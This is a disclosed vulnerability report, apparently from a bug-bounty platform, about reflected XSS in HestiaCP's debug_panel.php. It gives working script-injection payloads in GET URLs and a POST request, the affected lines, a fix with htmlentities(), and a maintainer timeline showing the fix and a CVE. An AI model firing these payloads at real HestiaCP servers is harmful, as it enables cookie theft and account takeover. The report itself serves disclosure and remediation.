Reflected XSS in hestiacp/hestiacp

Valid

Reported on

Jun 29th 2023

Description

An attacker can steal the session token of any user by exploiting reflected XSS.

Proof of Concept

Send GET request to any of the below links.

http://target/templates/pages/debug_panel.php?id=xss"><script>alert(document.cookie)</script>
http://target/templates/pages/debug_panel.php?id=xss"><script>alert('xss')</script>

Send POST request which looks like below

POST /templates/pages/debug_panel.php HTTP/1.1
Host: demo.hestiacp.com:8083
User-Agent: curl/7.79.1
Accept: */*
Content-Length: 34
Content-Type: application/x-www-form-urlencoded
Connection: close

{"id":"<script>alert(1)</script>"}

Impact

An attacker can steal session cookies and use them to perform a complete account takeover.

Occurrences

debug_panel.php L25

POST request parameters are not parsed here. It should be parsed with htmlentities() to prevent exploits like XSS.

debug_panel.php L31

GET request parameters are not parsed here. It should be parsed with htmlentities() to prevent exploits like XSS.

We are processing your report and will contact the hestiacp team within 24 hours. 5 months ago

Jaap Marcus modified the Severity from High (8.8) to Medium (4.3) 5 months ago

A hestiacp/hestiacp maintainer has acknowledged this report 5 months ago

commented 5 months ago

Maintainer

Have patched the issue will release it on 1.8.0 release.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Jaap Marcus validated this vulnerability 5 months ago

Vikas Gupta has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Jaap Marcus marked this as fixed in 1.7.8 with commit 2326aa 5 months ago

Jaap Marcus has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Jul 1st 2023

debug_panel.php#L25 has been validated

debug_panel.php#L31 has been validated

Jaap Marcus published this vulnerability 5 months ago

commented 5 months ago

Researcher

@maintainer Can someone assign CVE to this. Thanks

commented 5 months ago

Researcher

Ok i can see it published already. Thanks

to join this conversation

We are processing your report and will contact the hestiacp team within 24 hours. 5 months ago

Jaap Marcus modified the Severity from High (8.8) to Medium (4.3) 5 months ago

A hestiacp/hestiacp maintainer has acknowledged this report 5 months ago

commented 5 months ago

Maintainer

Have patched the issue will release it on 1.8.0 release.

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Jaap Marcus validated this vulnerability 5 months ago

Vikas Gupta has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Jaap Marcus marked this as fixed in 1.7.8 with commit 2326aa 5 months ago

Jaap Marcus has been awarded the fix bounty

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Jul 1st 2023

debug_panel.php#L25 has been validated

debug_panel.php#L31 has been validated

Jaap Marcus published this vulnerability 5 months ago

commented 5 months ago

Researcher

@maintainer Can someone assign CVE to this. Thanks

commented 5 months ago

Researcher

Ok i can see it published already. Thanks

to join this conversation